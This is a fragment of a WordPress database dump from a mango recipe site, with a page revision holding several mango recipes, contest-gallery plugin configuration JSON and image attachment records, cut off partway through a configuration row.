-->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1-edited.jpg\" alt=\"\" class=\"wp-image-860\" width=\"225\" height=\"141\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":861,\"width\":166,\"height\":166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg\" alt=\"\" class=\"wp-image-861\" width=\"166\" height=\"166\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":864,\"width\":213,\"height\":142,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/mangoseehikarne2-1024x682.jpg\" alt=\"\" class=\"wp-image-864\" width=\"213\" height=\"142\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":865,\"width\":233,\"height\":233,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download.jfif\" alt=\"\" class=\"wp-image-865\" width=\"233\" height=\"233\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":867,\"width\":132,\"height\":177,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download-1.jfif\" alt=\"\" class=\"wp-image-867\" width=\"132\" height=\"177\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":869,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/images.jfif\" alt=\"\" class=\"wp-image-869\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-08 15:28:12','2022-02-08 09:58:12','',745,'https://mangomitra.in/?p=874',0,'revision','',0),(881,1,'2022-02-09 11:03:15','2022-02-09 05:33:15','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":0}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\",\"enabled\":true}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\",\"seo\":{\"contest\":{\"description\":\"\"}}}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-09 11:03:15','2022-02-09 05:33:15','',787,'https://mangomitra.in/?p=881',0,'revision','',0),(888,1,'2022-02-09 12:14:18','2022-02-09 06:44:18','Contest Gallery ID-1 2022-02-09 06:44:18','252-2529007_pudding-jelly-hd-png-download','','inherit','open','closed','','252-2529007_pudding-jelly-hd-png-download-2','','','2022-02-09 12:14:18','2022-02-09 06:44:18','',0,'https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-2.png',0,'attachment','image/png',0),(889,13,'2022-02-09 12:30:11','2022-02-09 07:00:11','Contest Gallery ID-1 2022-02-09 07:00:11','252-2529007_pudding-jelly-hd-png-download','','inherit','open','closed','','252-2529007_pudding-jelly-hd-png-download-3','','','2022-02-09 12:30:11','2022-02-09 07:00:11','',0,'https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-3.png',0,'attachment','image/png',0),(890,1,'2022-02-09 12:46:34','2022-02-09 07:16:34','Contest Gallery ID-1 2022-02-09 07:16:34','Mango-Rasayana_finalforweb3-500x500','','inherit','open','closed','','mango-rasayana_finalforweb3-500x500','','','2022-02-09 12:46:34','2022-02-09 07:16:34','',0,'https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-2.jpg',0,'attachment','image/jpeg',0),(891,1,'2022-02-09 12:47:43','2022-02-09 07:17:43','Contest Gallery ID-1 2022-02-09 07:17:43','Mango-Rasayana_finalforweb3-500x500','','inherit','open','closed','','mango-rasayana_finalforweb3-500x500-2','','','2022-02-09 12:47:43','2022-02-09 07:17:43','',0,'https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-3.jpg',0,'attachment','image/jpeg',0),(892,1,'2022-02-09 13:09:25','2022-02-09 07:39:25','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"a3fca085-d916-4a36-8e45-64c8fee76d59\",\"type\":\"text\",\"name\":\"field_copy_copy_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]},\"email\":{\"enabled\":true},\"filled\":{\"enabled\":true}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"eb87fb2a-e236-4a99-862e-c420572930cd\",\"type\":\"number\",\"name\":\"field_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filled\":{\"enabled\":true}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":0}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHove